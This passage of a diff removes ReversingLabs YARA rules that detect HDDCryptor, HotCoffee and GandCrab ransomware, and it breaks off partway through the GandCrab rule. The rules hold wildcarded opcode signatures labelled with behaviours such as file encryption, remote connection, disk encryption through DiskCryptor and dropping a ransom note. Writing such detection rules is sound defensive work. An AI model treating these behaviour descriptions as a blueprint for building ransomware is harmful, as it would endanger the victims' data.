-            ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61
-            ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45
-            ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60
-            ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59
-            3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? ?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75
-            ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects HDDCryptor ransomware."
-		author = "ReversingLabs"
-		id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HDDCryptor"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$deploy_components = {
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB
-            E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ??
-            ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B
-            F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F
-            AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ??
-            ?? 0F AF FE 8B CB E8
-        }
-		$get_shares_info = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15
-        }
-		$encrypt_discs = {
-            68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66
-            85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41
-            ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            D7 B9 ?? ?? ?? ?? E8
-        }
-		$create_diskcryptor_service = {
-            83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15
-            ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33
-            C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ??
-            C3
-        }
-		$extract_diskcryptor_from_resources = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ??
-            ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56
-            0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ??
-            ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74
-            24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04
-            19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68
-            ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45
-            ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66
-            3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66
-            8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83
-            C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ??
-            8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3
-            A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_using_diskcryptor_p1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA
-            ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ??
-            33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44
-        }
-		$encrypt_files_using_diskcryptor_p2 = {
-            24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2
-            75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66
-            8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2
-            ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3
-            75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ??
-            8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84
-            24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8
-            E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ??
-            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$reboot = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $deploy_components ) and ( $get_shares_info ) and ( $encrypt_discs ) ) or ( ( $extract_diskcryptor_from_resources ) and ( $create_diskcryptor_service ) and ( all of ( $encrypt_files_using_diskcryptor_p* ) ) and ( $reboot ) ) )
-}
-rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects HotCoffee ransomware."
-		author = "ReversingLabs"
-		id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e"
-		date = "2021-11-25"
-		modified = "2021-11-25"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HotCoffee"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files = {
-            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
-            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
-            ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89
-            01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30
-            48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ??
-            48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
-            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B
-            C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83
-            C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6
-            BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48
-            03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ??
-            66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1
-            66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89
-            44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D
-            ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
-            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-        }
-		$encrypt_files_p1 = {
-            B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75
-            ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48
-            85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D
-            ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89
-            00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19
-            48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ??
-            ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ??
-            ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ??
-            ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45
-        }
-		$encrypt_files_p2 = {
-            33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B
-            15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44
-            24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48
-            8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ??
-            0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44
-            8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE
-            FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF
-            15 ?? ?? ?? ?? 4D 85 F6
-        }
-		$drop_ransom_note = {
-            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
-            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
-            ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83
-            C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89
-            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ??
-            ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0
-            46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 48 8B CB FF 15 ?? ??
-            ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95
-            ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
-            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48
-            8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ??
-            ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48
-            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15
-        }
-		$enum_drives = {
-            48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F
-            83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66
-            C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1
-            48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
-            77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B
-            ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_drives ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
-}
-rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects GandCrab ransomware."
-		author = "ReversingLabs"
-		id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461"
-		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GandCrab"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0
-            83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
-            8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6
-            6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D
-            85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ??
-            FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
-            C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74
